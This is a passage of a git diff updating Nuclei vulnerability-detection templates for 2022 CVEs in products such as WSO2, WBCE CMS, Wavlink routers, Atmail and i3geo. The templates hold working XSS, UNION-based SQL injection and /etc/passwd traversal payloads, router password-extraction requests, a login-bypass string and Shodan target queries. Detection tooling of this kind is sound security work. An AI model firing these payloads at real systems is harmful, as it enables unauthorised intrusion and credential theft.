5.5.0, 5.6.0, 5.7.0, 5.9.0, 5.10.0, and 5.11.0; Identity Server Analytics 5.5.0 and 5.6.0; and WSO2 Micro Integrator 1.0.0. + remediation: | + Apply the latest security patches or updates provided by WSO2 to fix the XSS vulnerability. reference: - - https://nvd.nist.gov/vuln/detail/CVE-2022-29548 - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29548 - https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2021-1603 + - https://nvd.nist.gov/vuln/detail/CVE-2022-29548 + - http://packetstormsecurity.com/files/167587/WSO2-Management-Console-Cross-Site-Scripting.html + - https://security.docs.wso2.com/en/latest/security-announcements/security-advisories/2022/WSO2-2021-1603/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-29548 cwe-id: CWE-79 + epss-score: 0.00299 + epss-percentile: 0.66119 + cpe: cpe:2.3:a:wso2:api_manager:2.2.0:*:*:*:*:*:*:* metadata: - google-dork: inurl:"carbon/admin/login" - verified: "true" - tags: cve,cve2022,wso2,xss -requests: + verified: true + max-request: 1 + vendor: wso2 + product: api_manager + google-query: inurl:"carbon/admin/login" + tags: cve,cve2022,wso2,xss,packetstorm + +http: - method: GET path: - "{{BaseURL}}/carbon/admin/login.jsp?loginStatus=false&errorCode=%27);alert(document.domain)//" + matchers-condition: and matchers: - type: word part: body words: - "CARBON.showWarningDialog('???');alert(document.domain)//???" + - type: word part: header words: - "text/html" + - type: status status: - 200 +# digest: 4b0a00483046022100b6c647cf81016609f95eb0b5625178cba66fbb69b9ca9e0f2d22e8e1b91ea560022100dacae7a43a2f04e2829f2552f3d9890689b6df3343ab32203c92610f7ae5b422:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2022-30073.yaml b/poc/cve/CVE-2022-30073.yaml index d4790c7327..6ffd826db8 100644 --- a/poc/cve/CVE-2022-30073.yaml +++ b/poc/cve/CVE-2022-30073.yaml @@ -1,33 +1,23 @@ id: CVE-2022-30073 - info: - name: WBCE CMS 1.5.2 - Cross-Site Scripting + name: WBCE CMS v1.5.2 XSS Stored author: arafatansari severity: medium description: | - WBCE CMS 1.5.2 contains a stored cross-site scripting vulnerability via \admin\user\save.php Display Name parameters. - remediation: | - Upgrade to a patched version of WBCE CMS or apply the vendor-supplied patch to mitigate this vulnerability. + WBCE CMS 1.5.2 is vulnerable to Cross Site Scripting (XSS) via \admin\user\save.php Display Name parameters. reference: - https://github.com/APTX-4879/CVE + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30073 - https://github.com/APTX-4879/CVE/blob/main/CVE-2022-30073.pdf - - https://nvd.nist.gov/vuln/detail/CVE-2022-30073 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N cvss-score: 5.4 cve-id: CVE-2022-30073 cwe-id: CWE-79 - epss-score: 0.00195 - epss-percentile: 0.57281 - cpe: cpe:2.3:a:wbce:wbce_cms:1.5.2:*:*:*:*:*:*:* metadata: - verified: true - max-request: 4 - vendor: wbce - product: wbce_cms + verified: "true" tags: cve,cve2022,wbcecms,xss - -http: +requests: - raw: - | POST /admin/login/index.php HTTP/1.1 @@ -47,7 +37,15 @@ http: - | GET /admin/users/index.php HTTP/1.1 Host: {{Hostname}} - + extractors: + - type: regex + name: formtoken + part: body + group: 1 + regex: + - '<input\stype="hidden"\sname="formtoken"\svalue="([^"]*)"\s/>' + internal: true + cookie-reuse: true matchers-condition: and matchers: - type: word @@ -56,22 +54,10 @@ http: - "<p><b><script>alert(document.cookie)</script>" - "WBCECMS" condition: and - - type: word part: header words: - text/html - - type: status status: - 200 - - extractors: - - type: regex - name: formtoken - group: 1 - regex: - - '<input\stype="hidden"\sname="formtoken"\svalue="([^"]*)"\s/>' - internal: true - part: body -# digest: 4b0a004830460221008ffe47614c146f0db8a32472174c85a7f7980fef4712e5c0d368b668aadc27a302210081d7a5d6c9bf2cfdbaeea1f2fbcae70e2e042b3806b7efc4fb7a0ac8217fef54:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2022-30489.yaml b/poc/cve/CVE-2022-30489.yaml index fa2302aea9..26c50ffda2 100644 --- a/poc/cve/CVE-2022-30489.yaml +++ b/poc/cve/CVE-2022-30489.yaml @@ -1,24 +1,34 @@ id: CVE-2022-30489 + info: - name: Wavlink Wn535g3 - POST XSS + name: Wavlink WN-535G3 - Cross-Site Scripting author: For3stCo1d severity: medium description: | - WAVLINK WN535 G3 was discovered to contain a cross-site scripting (XSS) vulnerability via the hostname parameter at /cgi-bin/login.cgi. + Wavlink WN-535G3 contains a POST cross-site scripting vulnerability via the hostname parameter at /cgi-bin/login.cgi. + remediation: | + Apply the latest firmware update provided by the vendor to mitigate this vulnerability. reference: - https://github.com/badboycxcc/XSS-CVE-2022-30489 - - https://nvd.nist.gov/vuln/detail/CVE-2022-30489 - https://github.com/badboycxcc/XSS + - https://nvd.nist.gov/vuln/detail/CVE-2022-30489 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-30489 cwe-id: CWE-79 + epss-score: 0.00101 + epss-percentile: 0.4119 + cpe: cpe:2.3:o:wavlink:wn535g3_firmware:-:*:*:*:*:*:*:* metadata: + verified: true + max-request: 1 + vendor: wavlink + product: wn535g3_firmware shodan-query: http.title:"Wi-Fi APP Login" - verified: "true" tags: xss,cve2022,wavlink,cve,router,iot -requests: + +http: - raw: - | POST /cgi-bin/login.cgi HTTP/1.1 @@ -26,6 +36,7 @@ requests: Content-Type: application/x-www-form-urlencoded newUI=1&page=login&username=admin&langChange=0&ipaddr=x.x.x.x&login_page=login.shtml&homepage=main.shtml&sysinitpage=sysinit.shtml&hostname=")</script><script>alert(document.domain);</script>&key=M27234733&password=63a36bceec2d3bba30d8611c323f4cda&lang_=cn + matchers-condition: and matchers: - type: word @@ -33,10 +44,13 @@ requests: - '<script>alert(document.domain);</script>' - 'parent.location.replace("http://")' condition: and + - type: word part: header words: - text/html + - type: status status: - 200 +# digest: 4a0a00473045022100c3998020833570168c8a520e8e3e9cba021783a9b78a1a83f85ba5f17f4725e302204743fb961bd8f4f6903b05bdd279a8be536ddaaacae15f1732e58101d30d715d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2022-30776.yaml b/poc/cve/CVE-2022-30776.yaml index 01d041919e..13cca2459e 100644 --- a/poc/cve/CVE-2022-30776.yaml +++ b/poc/cve/CVE-2022-30776.yaml @@ -1,53 +1,38 @@ id: CVE-2022-30776 - info: - name: Atmail 6.5.0 - Cross-Site Scripting + name: Atmail - Cross Site Scripting author: 3th1c_yuk1 severity: medium description: | - Atmail 6.5.0 contains a cross-site scripting vulnerability via the index.php/admin/index/ 'error' parameter. - remediation: | - Apply the latest security patches or upgrade to a newer version of Atmail that addresses this vulnerability. + atmail 6.5.0 allows XSS via the index.php/admin/index/ error parameter. reference: - https://medium.com/@bhattronit96/cve-2022-30776-cd34f977c2b9 - https://www.atmail.com/ - - https://help.atmail.com/hc/en-us/sections/115003283988 - https://nvd.nist.gov/vuln/detail/CVE-2022-30776 - - https://medium.com/%40bhattronit96/cve-2022-30776-cd34f977c2b9 + - https://help.atmail.com/hc/en-us/sections/115003283988 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-30776 cwe-id: CWE-79 - epss-score: 0.0013 - epss-percentile: 0.47644 - cpe: cpe:2.3:a:atmail:atmail:6.5.0:*:*:*:*:*:*:* metadata: - verified: true - max-request: 1 - vendor: atmail - product: atmail shodan-query: http.html:"atmail" + verified: "true" tags: cve,cve2022,atmail,xss - -http: +requests: - method: GET path: - "{{BaseURL}}/atmail/index.php/admin/index/?error=1%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" - matchers-condition: and matchers: - type: word part: body words: - "Error: 1<script>alert(document.domain)</script>" - - type: word part: header words: - text/html - - type: status status: - 200 -# digest: 4a0a00473045022100fc7c2a085b98fc4d069ddca8da1e86478eee97e73e987de37a959df1966e2da3022027bf812e355c6f7c909e8f042ca53952bb8247e5ed3f9c0f92af5fc4b2dbb4ff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2022-30777.yaml b/poc/cve/CVE-2022-30777.yaml index 2c50f208fc..64534b602c 100644 --- a/poc/cve/CVE-2022-30777.yaml +++ b/poc/cve/CVE-2022-30777.yaml @@ -1,38 +1,54 @@ id: CVE-2022-30777 + info: - name: Parallels H-Sphere - Cross Site Scripting + name: Parallels H-Sphere 3.6.1713 - Cross-Site Scripting author: 3th1c_yuk1 severity: medium description: | - Parallels H-Sphere 3.6.1713 allows XSS via the index_en.php from parameter. + Parallels H-Sphere 3.6.1713 contains a cross-site scripting vulnerability via the index_en.php 'from' parameter. + remediation: | + Apply the latest security patch or upgrade to a newer version of Parallels H-Sphere to mitigate the XSS vulnerability. reference: - https://medium.com/@bhattronit96/cve-2022-30777-45725763ab59 - - https://nvd.nist.gov/vuln/detail/CVE-2022-30777 - https://en.wikipedia.org/wiki/H-Sphere + - https://nvd.nist.gov/vuln/detail/CVE-2022-30777 + - https://medium.com/%40bhattronit96/cve-2022-30777-45725763ab59 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-30777 cwe-id: CWE-79 + epss-score: 0.001 + epss-percentile: 0.41109 + cpe: cpe:2.3:a:parallels:h-sphere:3.6.2:*:*:*:*:*:*:* metadata: + verified: true + max-request: 2 + vendor: parallels + product: h-sphere shodan-query: title:"h-sphere" - verified: "true" tags: cve,cve2022,parallels,hsphere,xss -requests: + +http: - method: GET path: - '{{BaseURL}}/index_en.php?from=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - '{{BaseURL}}/index.php?from=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + stop-at-first-match: true + matchers-condition: and matchers: - type: word words: - '<TITLE>"><script>alert(document.domain)</script>' + - type: word part: header words: - "text/html" + - type: status status: - 200 +# digest: 490a004630440220395810658e7a6e75c7e6be09c6f0cc6296b7b3ff7e63e262149b60c34ccb64520220657971320378b3ec006504c842a8a89480c3f29f05edabd1228e2c977c1c46f4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2022-32007.yaml b/poc/cve/CVE-2022-32007.yaml index b79eea8b8a..cc29bbd8fc 100644 --- a/poc/cve/CVE-2022-32007.yaml +++ b/poc/cve/CVE-2022-32007.yaml @@ -1,13 +1,10 @@ id: CVE-2022-32007 - info: - name: Complete Online Job Search System 1.0 - SQL Injection + name: Complete Online Job Search System v1.0 - SQL Injection author: arafatansari severity: high description: | - Complete Online Job Search System 1.0 contains a SQL injection vulnerability via /eris/admin/company/index.php?view=edit&id=. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site. - remediation: | - Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in the Complete Online Job Search System 1.0. + Complete Online Job Search System v1.0 is vulnerable to SQL Injection via /eris/admin/company/index.php?view=edit&id=. reference: - https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/online-job-search-system/SQLi-2.md - https://nvd.nist.gov/vuln/detail/CVE-2022-32007 @@ -16,19 +13,12 @@ info: cvss-score: 7.2 cve-id: CVE-2022-32007 cwe-id: CWE-89 - epss-score: 0.00666 - epss-percentile: 0.77425 - cpe: cpe:2.3:a:complete_online_job_search_system_project:complete_online_job_search_system:1.0:*:*:*:*:*:*:* metadata: - verified: true - max-request: 2 - vendor: complete_online_job_search_system_project - product: complete_online_job_search_system + verified: "true" tags: cve,cve2022,sqli,eris,authenticated variables: num: "999999999" - -http: +requests: - raw: - | POST /admin/login.php HTTP/1.1 @@ -39,10 +29,9 @@ http: - | GET /admin/company/index.php?view=edit&id=-3%27%20union%20select%201,md5({{num}}),3,4,5,6--+ HTTP/1.1 Host: {{Hostname}} - + cookie-reuse: true matchers: - type: word part: body words: - '{{md5({{num}})}}' -# digest: 4a0a0047304502204e81c3b94f8a7af4a67f3516242889aa363d3d1169c07aa2e615789d052c5d9202210083e8c7c37c641f47168fbb758803368887fe29a24a2b23c2401c8364d6244b16:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2022-32025.yaml b/poc/cve/CVE-2022-32025.yaml index 264da82048..fb24e14552 100644 --- a/poc/cve/CVE-2022-32025.yaml +++ b/poc/cve/CVE-2022-32025.yaml @@ -1,13 +1,10 @@ id: CVE-2022-32025 - info: - name: Car Rental Management System 1.0 - SQL Injection + name: Car Rental Management System v1.0 - SQL Injection author: arafatansari severity: high description: | - Car Rental Management System 1.0 contains an SQL injection vulnerability via /admin/view_car.php?id=. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site. - remediation: | - Upgrade to the latest version to mitigate this vulnerability. + Car Rental Management System v1.0 is vulnerable to SQL Injection via /admin/view_car.php?id=. reference: - https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/car-rental-management-system/SQLi-6.md - https://nvd.nist.gov/vuln/detail/CVE-2022-32025 @@ -16,21 +13,14 @@ info: cvss-score: 7.2 cve-id: CVE-2022-32025 cwe-id: CWE-89 - epss-score: 0.00666 - epss-percentile: 0.77425 - cpe: cpe:2.3:a:car_rental_management_system_project:car_rental_management_system:1.0:*:*:*:*:*:*:* metadata: - verified: true - max-request: 2 - vendor: car_rental_management_system_project - product: car_rental_management_system - shodan-query: http.html:"Car Rental Management System" comment: Login bypass is also possible using the payload - admin'+or+'1'%3D'1' in username. + shodan-query: http.html:"Car Rental Management System" + verified: "true" tags: cve,cve2022,carrental,cms,sqli,authenticated variables: num: "999999999" - -http: +requests: - raw: - | POST /admin/ajax.php?action=login HTTP/1.1 @@ -41,19 +31,16 @@ http: - | GET /admin/view_car.php?id=-1%20union%20select%201,md5({{num}}),3,4,5,6,7,8,9,10--+ HTTP/1.1 Host: {{Hostname}} - skip-variables-check: true - host-redirects: true + redirects: true max-redirects: 2 - + cookie-reuse: true matchers-condition: and matchers: - type: word part: body words: - '{{md5({{num}})}}' - - type: status status: - 200 -# digest: 490a0046304402201c659aed3475be0b4143ad2c71a723a996683763cae5e023475670ad40e6ed1402207ab4c5e7974da37287538ba07a5aa3c94b43baa7c3ba2d278e5ac2c876c9638f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2022-32028.yaml b/poc/cve/CVE-2022-32028.yaml index 6afb4dca59..5213c17713 100644 --- a/poc/cve/CVE-2022-32028.yaml +++ b/poc/cve/CVE-2022-32028.yaml @@ -1,10 +1,13 @@ id: CVE-2022-32028 + info: - name: Car Rental Management System v1.0 - SQL Injection + name: Car Rental Management System 1.0 - SQL Injection author: arafatansari severity: high description: | - Car Rental Management System v1.0 is vulnerable to SQL Injection via /admin/manage_user.php?id=. + Car Rental Management System 1.0 contains an SQL injection vulnerability via /admin/manage_user.php?id=. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site. + remediation: | + Upgrade to the latest version to mitigate this vulnerability. reference: - https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/car-rental-management-system/SQLi-8.md - https://nvd.nist.gov/vuln/detail/CVE-2022-32028 @@ -13,14 +16,21 @@ info: cvss-score: 7.2 cve-id: CVE-2022-32028 cwe-id: CWE-89 + epss-score: 0.00666 + epss-percentile: 0.77425 + cpe: cpe:2.3:a:car_rental_management_system_project:car_rental_management_system:1.0:*:*:*:*:*:*:* metadata: - comment: Login bypass is also possible using the payload - admin'+or+'1'%3D'1' in username. + verified: true + max-request: 2 + vendor: car_rental_management_system_project + product: car_rental_management_system shodan-query: http.html:"Car Rental Management System" - verified: "true" + comment: Login bypass is also possible using the payload - admin'+or+'1'%3D'1' in username. tags: cve,cve2022,carrental,cms,sqli,authenticated variables: num: "999999999" -requests: + +http: - raw: - | POST /admin/ajax.php?action=login HTTP/1.1 @@ -31,16 +41,19 @@ requests: - | GET /admin/manage_user.php?id=-1%20union%20select%201,md5({{num}}),3,4,5--+ HTTP/1.1 Host: {{Hostname}} + skip-variables-check: true - redirects: true + host-redirects: true max-redirects: 2 - cookie-reuse: true + matchers-condition: and matchers: - type: word part: body words: - '{{md5({{num}})}}' + - type: status status: - 200 +# digest: 4a0a00473045022100efcc8c42d2c7d8e0f883b365a7a7dbc51f136352d76ef5ae604c6f8db799645d0220194184d080e4b2f9beca67a2f8a38c24e38d2d95aab2f39b084a32cdb67b6260:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2022-32409.yaml b/poc/cve/CVE-2022-32409.yaml index aec3372d91..5a04e58cce 100644 --- a/poc/cve/CVE-2022-32409.yaml +++ b/poc/cve/CVE-2022-32409.yaml @@ -1,31 +1,44 @@ id: CVE-2022-32409 + info: - name: i3geo - Directory Traversal + name: Portal do Software Publico Brasileiro i3geo 7.0.5 - Local File Inclusion author: pikpikcu severity: critical - description: A local file inclusion (LFI) vulnerability in the component codemirror.php of Portal do Software Publico Brasileiro i3geo v7.0.5 allows attackers to execute arbitrary PHP code via a crafted HTTP request + description: Portal do Software Publico Brasileiro i3geo 7.0.5 is vulnerable to local file inclusion in the component codemirror.php, which allows attackers to execute arbitrary PHP code via a crafted HTTP request. + remediation: | + Apply the latest patch or upgrade to a newer version of i3geo to fix the LFI vulnerability. reference: - https://github.com/wagnerdracha/ProofOfConcept/blob/main/i3geo_proof_of_concept.txt - - https://nvd.nist.gov/vuln/detail/CVE-2022-32409 - https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11.1-Testing_for_Local_File_Inclusion + - https://nvd.nist.gov/vuln/detail/CVE-2022-32409 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-32409 - cwe-id: CWE-94 + cwe-id: CWE-22 + epss-score: 0.6578 + epss-percentile: 0.97589 + cpe: cpe:2.3:a:softwarepublico:i3geo:7.0.5:*:*:*:*:*:*:* metadata: + verified: true + max-request: 1 + vendor: softwarepublico + product: i3geo shodan-query: http.html:"i3geo" - verified: "true" tags: cve,cve2022,i3geo,lfi -requests: + +http: - method: GET path: - "{{BaseURL}}/i3geo/exemplos/codemirror.php?&pagina=../../../../../../../../../../../../../../../../../etc/passwd" + matchers-condition: and matchers: - type: regex regex: - "root:[x*]:0:0" + - type: status status: - 200 +# digest: 4b0a00483046022100982efe640cb6813105d3e0502ee86bbbebfa66f171ed4987bc0b27ba8c9918b70221009fba91ef1dca049c5cef1657c0a6b88bfaf5c281fee3779d14f302fbc1751567:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2022-32444.yaml b/poc/cve/CVE-2022-32444.yaml index 1460ae469c..b8298e2bc8 100644 --- a/poc/cve/CVE-2022-32444.yaml +++ b/poc/cve/CVE-2022-32444.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | u5cms version 8.3.5 contains a URL redirection vulnerability that can cause a user's browser to be redirected to another site via /loginsave.php. + remediation: | + Apply the latest patch or update to a version that has fixed this vulnerability. reference: - https://github.com/u5cms/u5cms/issues/50 - https://nvd.nist.gov/vuln/detail/CVE-2022-32444 @@ -14,9 +16,16 @@ info: cvss-score: 6.1 cve-id: CVE-2022-32444 cwe-id: CWE-601 + epss-score: 0.00252 + epss-percentile: 0.62982 + cpe: cpe:2.3:a:yuba:u5cms:8.3.5:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: yuba + product: u5cms tags: cve,cve2022,redirect,u5cms,cms -requests: +http: - method: GET path: - '{{BaseURL}}/loginsave.php?u=http://interact.sh' @@ -25,6 +34,5 @@ requests: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 - -# Enhanced by cs 05/30/2022 + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 +# digest: 4a0a00473045022100a78914985e18f5cbb208997f1dd7b38bb25273066dafdf058a929e48393ec9da02207604d0175228d8ce01f127bc96c071e03e41cde12f8736b825a78a436f806972:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2022-33119.yaml b/poc/cve/CVE-2022-33119.yaml index 223c8ed044..d0b19c4e99 100644 --- a/poc/cve/CVE-2022-33119.yaml +++ b/poc/cve/CVE-2022-33119.yaml @@ -1,10 +1,13 @@ id: CVE-2022-33119 + info: - name: NVRsolo v03.06.02 - Cross-Site Scripting + name: NUUO NVRsolo Video Recorder 03.06.02 - Cross-Site Scripting author: arafatansari severity: medium description: | - NUUO Network Video Recorder NVRsolo v03.06.02 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via login.php. + NUUO NVRsolo Video Recorder 03.06.02 contains a reflected cross-site scripting vulnerability via login.php. + remediation: | + Apply the latest security patch or upgrade to a non-vulnerable version of the NUUO NVRsolo Video Recorder software. reference: - https://github.com/badboycxcc/nuuo-xss/blob/main/README.md - https://nvd.nist.gov/vuln/detail/CVE-2022-33119 @@ -13,11 +16,18 @@ info: cvss-score: 6.1 cve-id: CVE-2022-33119 cwe-id: CWE-79 + epss-score: 0.012 + epss-percentile: 0.83584 + cpe: cpe:2.3:o:nuuo:nvrsolo_firmware:03.06.02:*:*:*:*:*:*:* metadata: + verified: true + max-request: 1 + vendor: nuuo + product: nvrsolo_firmware shodan-query: http.html:"NVRsolo" - verified: "true" tags: cve,cve2022,nvrsolo,xss -requests: + +http: - raw: - | POST /login.php HTTP/1.1 @@ -26,10 +36,12 @@ requests: Referer: "><script>alert(document.domain)</script><" language=en&user=user&pass=pass&submit=Login + matchers: - type: dsl dsl: - - 'contains(all_headers, "text/html")' + - 'contains(header, "text/html")' - 'status_code == 200' - contains(body,'<script>alert(document.domain)</script><\"?cmd=') condition: and +# digest: 490a00463044022055db44d33899d503ee6b8626525ec80f6f661c9e201e4b7f07e31700d0b2d09c02202725713186cb86ccc2ab145817d43f3c76880a377db2cc2b1c36ccbc048962fc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2022-34046.yaml b/poc/cve/CVE-2022-34046.yaml index 0e55de9a03..d82b9bd94d 100644 --- a/poc/cve/CVE-2022-34046.yaml +++ b/poc/cve/CVE-2022-34046.yaml @@ -1,22 +1,40 @@ id: CVE-2022-34046 + info: - name: Wavlink Sysinit.shtml - Password Exposure + name: WAVLINK WN533A8 - Improper Access Control author: For3stCo1d severity: high description: | - An access control issue in Wavlink WN533A8 M33A8.V5030.190716 allows attackers to obtain usernames and passwords via view-source:http://IP_ADDRESS/sysinit.shtml?r=52300 and searching for [logincheck(user);]. + WAVLINK WN533A8 M33A8.V5030.190716 is susceptible to improper access control. An attacker can obtain usernames and passwords via view-source:http://IP_ADDRESS/sysinit.shtml?r=52300 and searching for [logincheck(user);] and thereby possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + remediation: | + Apply the latest firmware update provided by the vendor to fix the access control issue. reference: - https://drive.google.com/file/d/18ECQEqZ296LDzZ0wErgqnNfen1jCn0mG/view?usp=sharing - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-34046 + - http://packetstormsecurity.com/files/167890/Wavlink-WN533A8-Password-Disclosure.html + - https://nvd.nist.gov/vuln/detail/CVE-2022-34046 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2022-34046 + cwe-id: CWE-863 + epss-score: 0.21264 + epss-percentile: 0.95934 + cpe: cpe:2.3:o:wavlink:wn533a8_firmware:m33a8.v5030.190716:*:*:*:*:*:*:* metadata: verified: true + max-request: 1 + vendor: wavlink + product: wn533a8_firmware shodan-query: http.title:"Wi-Fi APP Login" - tags: cve,cve2022,wavlink,router,exposure -requests: + tags: packetstorm,cve,cve2022,wavlink,router,exposure + +http: - raw: - | GET /sysinit.shtml?r=52300 HTTP/1.1 Host: {{Hostname}} + matchers-condition: and matchers: - type: word @@ -25,10 +43,13 @@ requests: - 'var syspasswd="' - '<title>APP' condition: and + - type: status status: - 200 + extractors: - type: regex regex: - 'syspasswd="(.+?)"' +# digest: 4b0a00483046022100bafc9417f898a2840edb34b17f554073320d96a46a4e44a009a4350115aac1bc022100c10d0717b078a31e6af838fde56852768f583696680154acb50c5266f8ea8960:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2022-34047.yaml b/poc/cve/CVE-2022-34047.yaml index 8bb1d25c72..4601f6daa5 100644 --- a/poc/cve/CVE-2022-34047.yaml +++ b/poc/cve/CVE-2022-34047.yaml @@ -1,40 +1,22 @@ id: CVE-2022-34047 - info: - name: WAVLINK WN530HG4 - Improper Access Control + name: Wavlink Set_safety.shtml - Password Exposure author: For3stCo1d severity: high description: | - WAVLINK WN530HG4 M30HG4.V5030.191116 is susceptible to improper access control. An attacker can obtain usernames and passwords via view-source:http://IP_ADDRESS/set_safety.shtml?r=52300 and searching for [var syspasswd] and thereby possibly obtain sensitive information, modify data, and/or execute unauthorized operations. - remediation: | - Apply the latest firmware update provided by the vendor to fix the access control issue. + An access control issue in Wavlink WN530HG4 M30HG4.V5030.191116 allows attackers to obtain usernames and passwords via view-source:http://IP_ADDRESS/set_safety.shtml?r=52300 and searching for [var syspasswd]. reference: - https://drive.google.com/file/d/1sTQdUc12aZvJRFeb5wp8AfPdUEkkU9Sy/view?usp=sharing - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-34047 - - http://packetstormsecurity.com/files/167891/Wavlink-WN530HG4-Password-Disclosure.html - - https://nvd.nist.gov/vuln/detail/CVE-2022-34047 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2022-34047 - cwe-id: CWE-668 - epss-score: 0.22865 - epss-percentile: 0.96043 - cpe: cpe:2.3:o:wavlink:wl-wn530hg4_firmware:m30hg4.v5030.191116:*:*:*:*:*:*:* metadata: verified: true - max-request: 1 - vendor: wavlink - product: wl-wn530hg4_firmware shodan-query: http.title:"Wi-Fi APP Login" - tags: cve2022,wavlink,router,exposure,packetstorm,cve - -http: + tags: cve,cve2022,wavlink,router,exposure +requests: - raw: - | GET /set_safety.shtml?r=52300 HTTP/1.1 Host: {{Hostname}} - matchers-condition: and matchers: - type: word @@ -43,13 +25,10 @@ http: - 'var syspasswd="' - 'APP' condition: and - - type: status status: - 200 - extractors: - type: regex regex: - 'syspasswd="(.+?)"' -# digest: 4a0a0047304502203e6425d62dbc524c88d9f4d728e5428b5519a34035c0500d1ed02ee54cff39c7022100ff3de55402f12ada4d323b5ae463cba5dbb44baeb439269ce989ceb58f13ade5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2022-34048.yaml b/poc/cve/CVE-2022-34048.yaml index 7292a945a4..7e4a956e81 100644 --- a/poc/cve/CVE-2022-34048.yaml +++ b/poc/cve/CVE-2022-34048.yaml @@ -1,41 +1,55 @@ id: CVE-2022-34048 + info: - name: Wavlink WN533A8 - Cross-Site Scripting (XSS) + name: Wavlink WN-533A8 - Cross-Site Scripting author: ritikchaddha severity: medium description: | - Wavlink WN533A8 M33A8.V5030.190716 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the login_page parameter. + Wavlink WN-533A8 M33A8.V5030.190716 contains a reflected cross-site scripting vulnerability via the login_page parameter. + remediation: | + Apply the latest firmware update provided by the vendor to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/50989 - - https://nvd.nist.gov/vuln/detail/CVE-2022-34048 - https://drive.google.com/file/d/1xznFhH3w3TDN2RCdX62_ebylR4yaKmzf/view?usp=sharing - https://drive.google.com/file/d/1NI3-k3AGIsSe2zjeigl1GVyU1VpG1SV3/view?usp=sharing + - https://nvd.nist.gov/vuln/detail/CVE-2022-34048 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-34048 cwe-id: CWE-79 + epss-score: 0.0009 + epss-percentile: 0.38133 + cpe: cpe:2.3:o:wavlink:wn533a8_firmware:m33a8.v5030.190716:*:*:*:*:*:*:* metadata: + verified: true + max-request: 1 + vendor: wavlink + product: wn533a8_firmware shodan-query: http.html:"Wavlink" - verified: "true" - tags: cve,cve2022,wavlink,xss,router -requests: + tags: cve2022,wavlink,xss,router,edb,cve + +http: - raw: - | POST /cgi-bin/login.cgi HTTP/1.1 Host: {{Hostname}} newUI=1&page=login&username=admin&langChange=0&ipaddr=196.219.234.10&login_page=x");alert(9);x=("&homepage=main.html&sysinitpage=sysinit.shtml&wizardpage=wiz.shtml&hostname=0.0.0.1&key=M94947765&password=ab4e98e4640b6c1ee88574ec0f13f908&lang_select=en + matchers-condition: and matchers: - type: word part: body words: - 'x");alert(9);x=("?login=0");' + - type: word part: header words: - "text/html" + - 